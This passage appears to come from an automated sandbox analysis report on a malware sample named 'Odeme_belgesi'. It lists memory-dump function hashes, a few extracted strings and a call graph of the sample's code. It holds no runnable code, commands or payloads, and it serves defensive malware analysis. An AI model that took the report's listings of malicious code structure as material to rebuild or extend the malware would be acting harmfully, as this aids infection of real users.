                • Opcode Fuzzy Hash: a75cecd5e981bd5dbdd6b527aedaf4289c58d38f857a9fada8c8b2aa5b39942f
                • Instruction Fuzzy Hash: CD71E178E11209DFCB04CFA9D48099EFBF2EF89314B248566E41AEB225D734AA41CF50
                Memory Dump Source
                • Source File: 00000000.00000002.1690953633.0000000004FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FF0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4ff0000_Odeme_belgesi.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 5b2a80b1005f1c1aafffe743e5e2b36bde0597d33eac4badbeceefbb1d7c7b4d
                • Instruction ID: f715d1d2ebdab7b10672fc64c6938501d04b2bc337f9f0077dfd35ac365da682
                • Opcode Fuzzy Hash: 5b2a80b1005f1c1aafffe743e5e2b36bde0597d33eac4badbeceefbb1d7c7b4d
                • Instruction Fuzzy Hash: DD611875E0520A9FCB04DF99D9819AEFBF1FF89310F14942AD615AB220D374AA42CF90
                Memory Dump Source
                • Source File: 00000000.00000002.1690953633.0000000004FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FF0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4ff0000_Odeme_belgesi.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: ba5ae1a1579f4b686702f36c927236d946fa850c87435f66088ce30045ab9798
                • Instruction ID: 6377b2770e122602e2a218e4b789bf2727f0088b120556a9ba4ea490402bf41b
                • Opcode Fuzzy Hash: ba5ae1a1579f4b686702f36c927236d946fa850c87435f66088ce30045ab9798
                • Instruction Fuzzy Hash: E371D575E05609CFDB04CFA9D9805DEFBF2FF88310F14942AD519B7224E334AA429B64
                Memory Dump Source
                • Source File: 00000000.00000002.1687887205.00000000028E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028E0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_28e0000_Odeme_belgesi.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 8cfc31d4de2474c88b47c86cadd7de7cb03b74dbcc5c8f34c0153c082cc1532d
                • Instruction ID: f1b22a3d6dcc44be7c118cc83d5a1d87d7bf6dbe976c34ba4167b9c02a32ab2c
                • Opcode Fuzzy Hash: 8cfc31d4de2474c88b47c86cadd7de7cb03b74dbcc5c8f34c0153c082cc1532d
                • Instruction Fuzzy Hash: 4971F2B8D0021ADFCB05CF99C5819AEFBB6FF5A314F14951AD426A7311E334A942CF94
                Memory Dump Source
                • Source File: 00000000.00000002.1690953633.0000000004FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FF0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4ff0000_Odeme_belgesi.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 909213086c66b35ad7b609285011e3896a2623e455d0d601309024d628675ac1
                • Instruction ID: 9fb172491c30843cbcdc3d5c0215df7566287d83bd2fecb09cb7343f057f771e
                • Opcode Fuzzy Hash: 909213086c66b35ad7b609285011e3896a2623e455d0d601309024d628675ac1
                • Instruction Fuzzy Hash: D561E675E15609CFCB04CFA9C9809DEFBF2FF89310F14946AD519B7224E334AA429B64
                Memory Dump Source
                • Source File: 00000000.00000002.1687887205.00000000028E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028E0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_28e0000_Odeme_belgesi.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 265e34ef3aae539b6831784dd6fae48dbaca09423d89d711ea74ac0376ec58a9
                • Instruction ID: a8e0b397350a38eb2ab35eb0bd79ba3de6e973f9bf0ee185c7ab11dc0e21e332
                • Opcode Fuzzy Hash: 265e34ef3aae539b6831784dd6fae48dbaca09423d89d711ea74ac0376ec58a9
                • Instruction Fuzzy Hash: 7661F378D0421ACFCB05CFA9C5819AEFBB5FF9A314F148566D426E7211E334A942CF94
                Memory Dump Source
                • Source File: 00000000.00000002.1687887205.00000000028E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028E0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_28e0000_Odeme_belgesi.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 2a2d53797c5037dde6e006dfb5662a2c2cf3ecd7f32c570cc5f3e8552a114c08
                • Instruction ID: e8e6e541d7d07c8a534068c3374d84db10177785d97eef65a89ceb56b3f64909
                • Opcode Fuzzy Hash: 2a2d53797c5037dde6e006dfb5662a2c2cf3ecd7f32c570cc5f3e8552a114c08
                • Instruction Fuzzy Hash: 1161D278E05219CFCF08CFA9D5805EEFBF6AF99214F24942AD406B7314E3349941CB65
                Memory Dump Source
                • Source File: 00000000.00000002.1687887205.00000000028E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028E0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_28e0000_Odeme_belgesi.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 2078c24d02ef98e40a426a03bde7dd9104e6d0e1c8e940a23290f747ab27763c
                • Instruction ID: 14290a9d87291739c47de21f10c8c6fe921dacdb080bc53682b612f823a8e1d0
                • Opcode Fuzzy Hash: 2078c24d02ef98e40a426a03bde7dd9104e6d0e1c8e940a23290f747ab27763c
                • Instruction Fuzzy Hash: 6D61D278E152198FCF08CFA9D5805EEFBF2AF99214F28942AD416F7314E3349A41CB64
                Memory Dump Source
                • Source File: 00000000.00000002.1690953633.0000000004FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FF0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4ff0000_Odeme_belgesi.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: ba2b7077cd12e335cd9de4498ee9a7af88f8738617cf16bfb17c6285ece5a02a
                • Instruction ID: f58aaa469e4199501f41c78459cc295c3769db7358ab90a290f888888ec912fc
                • Opcode Fuzzy Hash: ba2b7077cd12e335cd9de4498ee9a7af88f8738617cf16bfb17c6285ece5a02a
                • Instruction Fuzzy Hash: DD611771E15209CFCB04CFAAD9805DEFBF2FF89310F14952AD505B7224E734AA428B65
                Memory Dump Source
                • Source File: 00000000.00000002.1690953633.0000000004FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FF0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4ff0000_Odeme_belgesi.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 99ee8642bc1542e3033c5d7e7d65d2995152792e94ec3664ffacceb0c8224276
                • Instruction ID: 092dd4ca18fba40a83f63d7f9f4f4bbff267a91e5e290909e1f8d8922f82e97f
                • Opcode Fuzzy Hash: 99ee8642bc1542e3033c5d7e7d65d2995152792e94ec3664ffacceb0c8224276
                • Instruction Fuzzy Hash: D451CCB1D056548FEB29CF6A8C44699BBB3BFC9310F14C1FA950CAB215DB311A96CF41
                Memory Dump Source
                • Source File: 00000000.00000002.1690953633.0000000004FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FF0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4ff0000_Odeme_belgesi.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: ae10d66a09bd540a60b20e5293f33254b5b93fc11be335d99890ffa0c994306e
                • Instruction ID: e8478225fac9b3d5d24708ef4c27b26af0691eb18334727c1a30ecc8777dd239
                • Opcode Fuzzy Hash: ae10d66a09bd540a60b20e5293f33254b5b93fc11be335d99890ffa0c994306e
                • Instruction Fuzzy Hash: 5C511A71E0460ADFCB04CFAACA405AEBBF2EF89310F54C56AC519A7214E7346A42CF50
                Memory Dump Source
                • Source File: 00000000.00000002.1690953633.0000000004FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FF0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4ff0000_Odeme_belgesi.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 8e7825c8f4ea4d03d868c232fe169750ae5c0341508b77c47c2d72f405e58b9b
                • Instruction ID: 86eef0bf206221e5d87c1993f480b2136bb9b975cc90f7637596710185144eb0
                • Opcode Fuzzy Hash: 8e7825c8f4ea4d03d868c232fe169750ae5c0341508b77c47c2d72f405e58b9b
                • Instruction Fuzzy Hash: E5510871E0460ADFCB14CFEAC9815AEFBB2AF98300F14D52AC519A7224E6349642DF94
                Memory Dump Source
                • Source File: 00000000.00000002.1690953633.0000000004FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FF0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4ff0000_Odeme_belgesi.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: d4e349e98843d2163fdb71b8535ee56b3ef61b2e1c1934c4a3b60f65b724aef8
                • Instruction ID: 558bb94ab2f6b110fef5490f8fbd0a51691722d96561ccacdfbb00c44f11c005
                • Opcode Fuzzy Hash: d4e349e98843d2163fdb71b8535ee56b3ef61b2e1c1934c4a3b60f65b724aef8
                • Instruction Fuzzy Hash: 7151F975E152198FDB58CFA9D980A9EF7B2FF88310F14C0AAD508A7324DB306A45CF61
                Memory Dump Source
                • Source File: 00000000.00000002.1690953633.0000000004FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FF0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4ff0000_Odeme_belgesi.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: c80392e8d82c3a010370d15c197e910ef7936689da227262db9442a9e23e176b
                • Instruction ID: 745124b9c9ddabcae64e13576414091f64fad0c3fe89c9840cd27319ad95a75f
                • Opcode Fuzzy Hash: c80392e8d82c3a010370d15c197e910ef7936689da227262db9442a9e23e176b
                • Instruction Fuzzy Hash: 4A510B71E0560ADBCB14CFEAC9805AEFBF2EF98300F14D529C519A7364E734A6428F94
                Memory Dump Source
                • Source File: 00000000.00000002.1690953633.0000000004FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FF0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4ff0000_Odeme_belgesi.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 2fb194ea75a51a27acc8370c141620e198e3406b69ebbc7ab2ed50efbc8153e6
                • Instruction ID: bd094835bd1382e40bb9814b5f0892e94dd7be8b8a446f69148142fd43af15e4
                • Opcode Fuzzy Hash: 2fb194ea75a51a27acc8370c141620e198e3406b69ebbc7ab2ed50efbc8153e6
                • Instruction Fuzzy Hash: 6C41EB75E0520ADFDB44CFA9CA415EEFBF2AF88300F24D569C615B7224E7349A42CB94
                Memory Dump Source
                • Source File: 00000000.00000002.1687887205.00000000028E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028E0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_28e0000_Odeme_belgesi.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: a249525ce290aea7ec9415ea0526c2b09d35cdc3df31e358e2fe7a0b54829558
                • Instruction ID: fe3907f24d671d9c70101ad80ab7beb4c3baa84a52f1ede32b36ba3e1983f349
                • Opcode Fuzzy Hash: a249525ce290aea7ec9415ea0526c2b09d35cdc3df31e358e2fe7a0b54829558
                • Instruction Fuzzy Hash: 2541D6B8E052199BDB44CFA9C5805AEFBF2FF89304F24846AC415E7215E7349A41CB95
                Memory Dump Source
                • Source File: 00000000.00000002.1687887205.00000000028E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028E0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_28e0000_Odeme_belgesi.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 52cdeba3221ca41e07b8e3b65ccf8d35e757dabbeccdf80df329fd061848df9b
                • Instruction ID: 5116c416ba6b33bec7f10d9dc938c76ee3592e2168697fde7c0faec166af5f4b
                • Opcode Fuzzy Hash: 52cdeba3221ca41e07b8e3b65ccf8d35e757dabbeccdf80df329fd061848df9b
                • Instruction Fuzzy Hash: 4541E6B8E0521ADBDB44CFA9C5405AEFBF6FB99304F24846AC416F7214E7349A41CB94
                Memory Dump Source
                • Source File: 00000000.00000002.1690953633.0000000004FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FF0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4ff0000_Odeme_belgesi.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 8bf86b0c9519b52eb3cf15e81e589ba82c68a0e9781dc81dbb87f5e64652a531
                • Instruction ID: c7c60b67990411c4100e29cf60a44491f3c8114a951dc15356cb698073d7b306
                • Opcode Fuzzy Hash: 8bf86b0c9519b52eb3cf15e81e589ba82c68a0e9781dc81dbb87f5e64652a531
                • Instruction Fuzzy Hash: 8341D971E0460ADFDB44CFAACA405AEBBF2BF88300F54C469C515B7254D7346A42DF94
                Memory Dump Source
                • Source File: 00000000.00000002.1687887205.00000000028E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028E0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_28e0000_Odeme_belgesi.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 1de603c352b8692d63940f8445ef3ef3998dc8043b3892a3fe79b4c9162a27a3
                • Instruction ID: 83a823faf870102495fc9fefc8860d7d09cf55905f33387e0771201dcc9e295a
                • Opcode Fuzzy Hash: 1de603c352b8692d63940f8445ef3ef3998dc8043b3892a3fe79b4c9162a27a3
                • Instruction Fuzzy Hash: 0F41E378E042199FCF44CFAAC4815AEBBF2BF99300F24C56AC815E7251E7349A45CF90
                Memory Dump Source
                • Source File: 00000000.00000002.1687887205.00000000028E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028E0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_28e0000_Odeme_belgesi.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 29e673fa9dd09bb611d6403e295518c5f89d91a4622257ab6c1adfca599964e4
                • Instruction ID: 0234d12a27e6df17dacc0d50a0da5c9b51fe137a7bf40b62051a9b2b557b76c5
                • Opcode Fuzzy Hash: 29e673fa9dd09bb611d6403e295518c5f89d91a4622257ab6c1adfca599964e4
                • Instruction Fuzzy Hash: 3541C2B8E0561ADBCF44CFAAC4815AEFBF6BB99300F24C52AC415E7250E7349A41CF94
                Memory Dump Source
                • Source File: 00000000.00000002.1690953633.0000000004FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FF0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4ff0000_Odeme_belgesi.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 68fa6dc971995b00158720b4a283438f5cbaaab4e546c9f8210239b61d804ec0
                • Instruction ID: e89adc35acc42d1cc84a2e11aba457d75b28c55d412e31710bd11d5dec610ed0
                • Opcode Fuzzy Hash: 68fa6dc971995b00158720b4a283438f5cbaaab4e546c9f8210239b61d804ec0
                • Instruction Fuzzy Hash: 1B315C71E11219DBDB28CF6AD8406AEFBB6FFC8200F10C17AD508A7214EB305A028F61
                Memory Dump Source
                • Source File: 00000000.00000002.1687887205.00000000028E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028E0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_28e0000_Odeme_belgesi.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: d4e6a9ef70e98c0f47cd25d89a7bb80882dc293768b45051dfda9b61ab696cfa
                • Instruction ID: 8e1b4b981e274db246fa81170a099b382b4aef280e3ba44f895574acb332d940
                • Opcode Fuzzy Hash: d4e6a9ef70e98c0f47cd25d89a7bb80882dc293768b45051dfda9b61ab696cfa
                • Instruction Fuzzy Hash: F7213375E116198BDB18CFABD9406DEFBF7AFC8210F14C12AD508A7224EB304A128B90
                Memory Dump Source
                • Source File: 00000000.00000002.1687887205.00000000028E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028E0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_28e0000_Odeme_belgesi.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 9e73ef53bb056dd96c8e1b4046014ea1d4eb61d20bee4f16b1c069bdb1437eb1
                • Instruction ID: ed3cedfa9af714d66b439d918c3a8e97fda0ee228170650f9d91418c1ef48bb8
                • Opcode Fuzzy Hash: 9e73ef53bb056dd96c8e1b4046014ea1d4eb61d20bee4f16b1c069bdb1437eb1
                • Instruction Fuzzy Hash: FB1144B1E116198BDB08CFAAD9416AEFBF7BFC8300F14C02AD908B7214DB305A118F90
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1690953633.0000000004FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FF0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4ff0000_Odeme_belgesi.jbxd
                Similarity
                • API ID:
                • String ID: N$?'$N$?'$N$?'$N$?'
                • API String ID: 0-2518781044
                • Opcode ID: 16f8c50024efc57e6c265156b9630ddaa3dda1855226660261b89fd60014c77f
                • Instruction ID: ee4c8caa36bdd359b02216444c94ac5fc38eb48816989b972335e72b6fc60bea
                • Opcode Fuzzy Hash: 16f8c50024efc57e6c265156b9630ddaa3dda1855226660261b89fd60014c77f
                • Instruction Fuzzy Hash: F63158B0E10119DFCB04CFA9C9905EEFBB2BF89304F1484AAC654B7211DB34AA46CF91

                Execution Graph

                Execution Coverage:31%
                Dynamic/Decrypted Code Coverage:0%
                Signature Coverage:4.4%
                Total number of Nodes:1846
                Total number of Limit Nodes:92
                execution_graph 9703 40c640 9730 404bee 9703->9730 9706 40c70f 9707 404bee 6 API calls 9708 40c66b 9707->9708 9709 404bee 6 API calls 9708->9709 9715 40c708 9708->9715 9712 40c683 9709->9712 9710 402bab 2 API calls 9710->9706 9711 40c701 9714 402bab 2 API calls 9711->9714 9712->9711 9713 404bee 6 API calls 9712->9713 9718 40c694 9713->9718 9714->9715 9715->9710 9716 40c6f8 9717 402bab 2 API calls 9716->9717 9717->9711 9718->9716 9737 40c522 9718->9737 9720 40c6a9 9721 40c6ef 9720->9721 9723 405872 4 API calls 9720->9723 9722 402bab 2 API calls 9721->9722 9722->9716 9724 40c6c5 9723->9724 9725 405872 4 API calls 9724->9725 9726 40c6d5 9725->9726 9727 405872 4 API calls 9726->9727 9728 40c6e7 9727->9728 9729 402bab 2 API calls 9728->9729 9729->9721 9731 402b7c 2 API calls 9730->9731 9732 404bff 9731->9732 9733 404c3b 9732->9733 9734 4031e5 4 API calls 9732->9734 9733->9706 9733->9707 9735 404c28 9734->9735 9735->9733 9736 402bab 2 API calls 9735->9736 9736->9733 9738 402b7c 2 API calls 9737->9738 9739 40c542 9738->9739 9739->9720 9740 405941 9741 4031e5 4 API calls 9740->9741 9742 405954 9741->9742 8307 409046 8320 413b28 8307->8320 8309 40906d 8311 405b6f 6 API calls 8309->8311 8310 40904e 8310->8309 8312 403fbf 7 API calls 8310->8312 8313 40907c 8311->8313 8312->8309 8314 409092 8313->8314 8324 409408 8313->8324 8316 4090a3 8314->8316 8319 402bab 2 API calls 8314->8319 8318 402bab 2 API calls 8318->8314 8319->8316 8321 413b31 8320->8321 8322 413b38 8320->8322 8323 404056 6 API calls 8321->8323 8322->8310 8323->8322 8325 409413 8324->8325 8326 40908c 8325->8326 8338 409d36 8325->8338 8326->8318 8337 40945c 8444 40a35d 8337->8444 8339 409d43 8338->8339 8340 40a35d 4 API calls 8339->8340 8341 409d55 8340->8341 8342 4031e5 4 API calls 8341->8342 8343 409d8b 8342->8343 8344 4031e5 4 API calls 8343->8344 8345 409dd0 8344->8345 8346 405b6f 6 API calls 8345->8346 8377 409423 8345->8377 8349 409df7 8346->8349 8347 409e1c 8348 4031e5 4 API calls 8347->8348 8347->8377 8350 409e62 8348->8350 8349->8347 8351 402bab 2 API calls 8349->8351 8352 4031e5 4 API calls 8350->8352 8351->8347 8353 409e82 8352->8353 8354 4031e5 4 API calls 8353->8354 8355 409ea2 8354->8355 8356 4031e5 4 API calls 8355->8356 8357 409ec2 8356->8357 8358 4031e5 4 API calls 8357->8358 8359 409ee2 8358->8359 8360 4031e5 4 API calls 8359->8360 8361 409f02 8360->8361 8362 4031e5 4 API calls 8361->8362 8363 409f22 8362->8363 8364 4031e5 4 API calls 8363->8364 8367 409f42 8364->8367 8365 40a19b 8366 408b2c 4 API calls 8365->8366 8366->8377 8367->8365 8368 409fa3 8367->8368 8369 405b6f 6 API calls 8368->8369 8368->8377 8370 409fbd 8369->8370 8371 40a02c 8370->8371 8372 402bab 2 API calls 8370->8372 8373 4031e5 4 API calls 8371->8373 8399 40a16d 8371->8399 8375 409fd7 8372->8375 8376 40a070 8373->8376 8374 402bab 2 API calls 8374->8377 8378 405b6f 6 API calls 8375->8378 8379 4031e5 4 API calls 8376->8379 8377->8337 8400 4056bf 8377->8400 8381 409fe5 8378->8381 8380 40a090 8379->8380 8382 4031e5 4 API calls 8380->8382 8381->8371 8383 402bab 2 API calls 8381->8383 8384 40a0b0 8382->8384 8385 409fff 8383->8385 8388 4031e5 4 API calls 8384->8388 8386 405b6f 6 API calls 8385->8386 8387 40a00d 8386->8387 8387->8371 8390 40a021 8387->8390 8389 40a0d0 8388->8389 8392 4031e5 4 API calls 8389->8392 8391 402bab 2 API calls 8390->8391 8391->8377 8393 40a0f0 8392->8393 8394 4031e5 4 API calls 8393->8394 8396 40a110 8394->8396 8395 40a134 8395->8399 8454 408b2c 8395->8454 8396->8395 8397 4031e5 4 API calls 8396->8397 8397->8395 8399->8374 8399->8377 8401 402b7c 2 API calls 8400->8401 8402 4056cd 8401->8402 8403 4056d4 8402->8403 8404 402b7c 2 API calls 8402->8404 8405 408c4d 8403->8405 8404->8403 8406 413ba4 6 API calls 8405->8406 8407 408c5c 8406->8407 8408 408f02 8407->8408 8409 408f3a 8407->8409 8412 40903e 8407->8412 8411 405b6f 6 API calls 8408->8411 8410 405b6f 6 API calls 8409->8410 8426 408f51 8410->8426 8413 408f0c 8411->8413 8428 413aca 8412->8428 8413->8412 8417 408f31 8413->8417 8457 40a1b6 8413->8457 8415 405b6f 6 API calls 8415->8426 8416 402bab 2 API calls 8416->8412 8417->8416 8419 409031 8420 402bab 2 API calls 8419->8420 8420->8417 8421 409022 8422 402bab 2 API calls 8421->8422 8423 409028 8422->8423 8424 402bab 2 API calls 8423->8424 8424->8417 8425 402bab GetProcessHeap HeapFree 8425->8426 8426->8412 8426->8415 8426->8417 8426->8419 8426->8421 8426->8425 8427 40a1b6 14 API calls 8426->8427 8491 4044ee 8426->8491 8427->8426 8429 409451 8428->8429 8430 413ad7 8428->8430 8438 405695 8429->8438 8431 405781 4 API calls 8430->8431 8432 413af0 8431->8432 8433 405781 4 API calls 8432->8433 8434 413afe 8433->8434 8435 405762 4 API calls 8434->8435 8436 413b0e 8435->8436 8436->8429 8437 405781 4 API calls 8436->8437 8437->8429 8439 4056a0 8438->8439 8440 4056b9 8438->8440 8441 402bab 2 API calls 8439->8441 8440->8337 8442 4056b3 8441->8442 8443 402bab 2 API calls 8442->8443 8443->8440 8445 40a39a 8444->8445 8446 40a368 8444->8446 8447 4031e5 4 API calls 8445->8447 8449 40a3af 8445->8449 8450 4031e5 4 API calls 8446->8450 8447->8449 8448 40a3ca 8452 40a38a 8448->8452 8453 408b2c 4 API calls 8448->8453 8449->8448 8451 408b2c 4 API calls 8449->8451 8450->8452 8451->8448 8452->8326 8453->8452 8455 4031e5 4 API calls 8454->8455 8456 408b3e 8455->8456 8456->8399 8458 40a202 8457->8458 8459 40a1c3 8457->8459 8613 405f08 8458->8613 8460 405b6f 6 API calls 8459->8460 8463 40a1d0 8460->8463 8462 40a1fc 8462->8417 8463->8462 8466 40a1f3 8463->8466 8501 40a45b 8463->8501 8465 40a333 8467 402bab 2 API calls 8465->8467 8469 402bab 2 API calls 8466->8469 8467->8462 8469->8462 8470 405b6f 6 API calls 8472 40a245 8470->8472 8471 40a25d 8473 405b6f 6 API calls 8471->8473 8472->8471 8474 413a58 13 API calls 8472->8474 8479 40a26b 8473->8479 8475 40a257 8474->8475 8478 402bab 2 API calls 8475->8478 8476 40a28b 8477 405b6f 6 API calls 8476->8477 8484 40a297 8477->8484 8478->8471 8479->8476 8480 40a284 8479->8480 8620 40955b 8479->8620 8482 402bab 2 API calls 8480->8482 8482->8476 8483 405b6f 6 API calls 8488 40a2b7 8483->8488 8485 40a2b0 8484->8485 8484->8488 8627 40968e 8484->8627 8486 402bab 2 API calls 8485->8486 8486->8488 8488->8465 8488->8483 8490 402bab 2 API calls 8488->8490 8637 4098a7 8488->8637 8490->8488 8492 402b7c 2 API calls 8491->8492 8493 404512 8492->8493 8495 404585 GetLastError 8493->8495 8496 402bab 2 API calls 8493->8496 8499 40457c 8493->8499 8500 402b7c 2 API calls 8493->8500 8892 4044a7 8493->8892 8497 404592 8495->8497 8495->8499 8496->8493 8498 402bab 2 API calls 8497->8498 8498->8499 8499->8426 8500->8493 8646 40642c 8501->8646 8503 40a469 8504 40c4ff 8503->8504 8649 4047e6 8503->8649 8504->8466 8507 4040bb 12 API calls 8508 40bf88 8507->8508 8508->8504 8509 403c90 8 API calls 8508->8509 8510 40bfaa 8509->8510 8511 402b7c 2 API calls 8510->8511 8513 40bfc1 8511->8513 8512 40c4f3 8514 403f9e 5 API calls 8512->8514 8515 40c3aa 8513->8515 8656 40a423 8513->8656 8514->8504 8515->8512 8518 4056bf 2 API calls 8515->8518 8521 40c4e3 8515->8521 8516 402bab 2 API calls 8516->8512 8520 40c3d2 8518->8520 8520->8521 8523 4040bb 12 API calls 8520->8523 8521->8516 8522 405f08 4 API calls 8524 40c005 8522->8524 8525 40c3f3 8523->8525 8526 40c021 8524->8526 8659 40a43f 8524->8659 8528 40c4d1 8525->8528 8716 405a52 8525->8716 8527 4031e5 4 API calls 8526->8527 8530 40c034 8527->8530 8533 413aca 4 API calls 8528->8533 8539 4031e5 4 API calls 8530->8539 8534 40c4dd 8533->8534 8537 405695 2 API calls 8534->8537 8535 40c411 8721 405a87 8535->8721 8536 402bab 2 API calls 8536->8526 8537->8521 8545 40c04d 8539->8545 8540 40c4b3 8541 402bab 2 API calls 8540->8541 8543 40c4cb 8541->8543 8542 405a52 4 API calls 8553 40c423 8542->8553 8544 403f9e 5 API calls 8543->8544 8544->8528 8547 4031e5 4 API calls 8545->8547 8546 405a87 4 API calls 8546->8553 8548 40c085 8547->8548 8550 4031e5 4 API calls 8548->8550 8549 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree 8549->8553 8551 40c09c 8550->8551 8554 4031e5 4 API calls 8551->8554 8552 402bab 2 API calls 8552->8553 8553->8540 8553->8542 8553->8546 8553->8549 8553->8552 8555 40c0b3 8554->8555 8556 4031e5 4 API calls 8555->8556 8557 40c0ca 8556->8557 8558 4031e5 4 API calls 8557->8558 8559 40c0e7 8558->8559 8560 4031e5 4 API calls 8559->8560 8561 40c100 8560->8561 8562 4031e5 4 API calls 8561->8562 8563 40c119 8562->8563 8564 4031e5 4 API calls 8563->8564 8565 40c132 8564->8565 8566 4031e5 4 API calls 8565->8566 8567 40c14b 8566->8567 8568 4031e5 4 API calls 8567->8568 8569 40c164 8568->8569 8570 4031e5 4 API calls 8569->8570 8571 40c17d 8570->8571 8572 4031e5 4 API calls 8571->8572 8573 40c196 8572->8573 8574 4031e5 4 API calls 8573->8574 8575 40c1af 8574->8575 8576 4031e5 4 API calls 8575->8576 8577 40c1c8 8576->8577 8578 4031e5 4 API calls 8577->8578 8579 40c1de 8578->8579 8580 4031e5 4 API calls 8579->8580 8581 40c1f4 8580->8581 8582 4031e5 4 API calls 8581->8582 8583 40c20d 8582->8583 8584 4031e5 4 API calls 8583->8584 8585 40c226 8584->8585 8586 4031e5 4 API calls 8585->8586 8587 40c23f 8586->8587 8588 4031e5 4 API calls 8587->8588 8589 40c258 8588->8589 8590 4031e5 4 API calls 8589->8590 8591 40c273 8590->8591 8592 4031e5 4 API calls 8591->8592 8593 40c28a 8592->8593 8594 4031e5 4 API calls 8593->8594 8597 40c2d5 8594->8597 8595 40c3a2 8596 402bab 2 API calls 8595->8596 8596->8515 8597->8595 8598 4031e5 4 API calls 8597->8598 8599 40c315 8598->8599 8600 40c38b 8599->8600 8662 404866 8599->8662 8601 403c40 5 API calls 8600->8601 8603 40c397 8601->8603 8605 403c40 5 API calls 8603->8605 8605->8595 8606 40c382 8608 403c40 5 API calls 8606->8608 8608->8600 8610 406c4c 6 API calls 8611 40c355 8610->8611 8611->8606 8686 4126a7 8611->8686 8614 4031e5 4 API calls 8613->8614 8615 405f1d 8614->8615 8616 405f55 8615->8616 8617 402b7c 2 API calls 8615->8617 8616->8462 8616->8465 8616->8470 8616->8471 8618 405f36 8617->8618 8618->8616 8619 4031e5 4 API calls 8618->8619 8619->8616 8621 409673 8620->8621 8626 40956d 8620->8626 8621->8480 8622 408b45 6 API calls 8622->8626 8623 4059d8 GetProcessHeap RtlAllocateHeap GetProcAddress 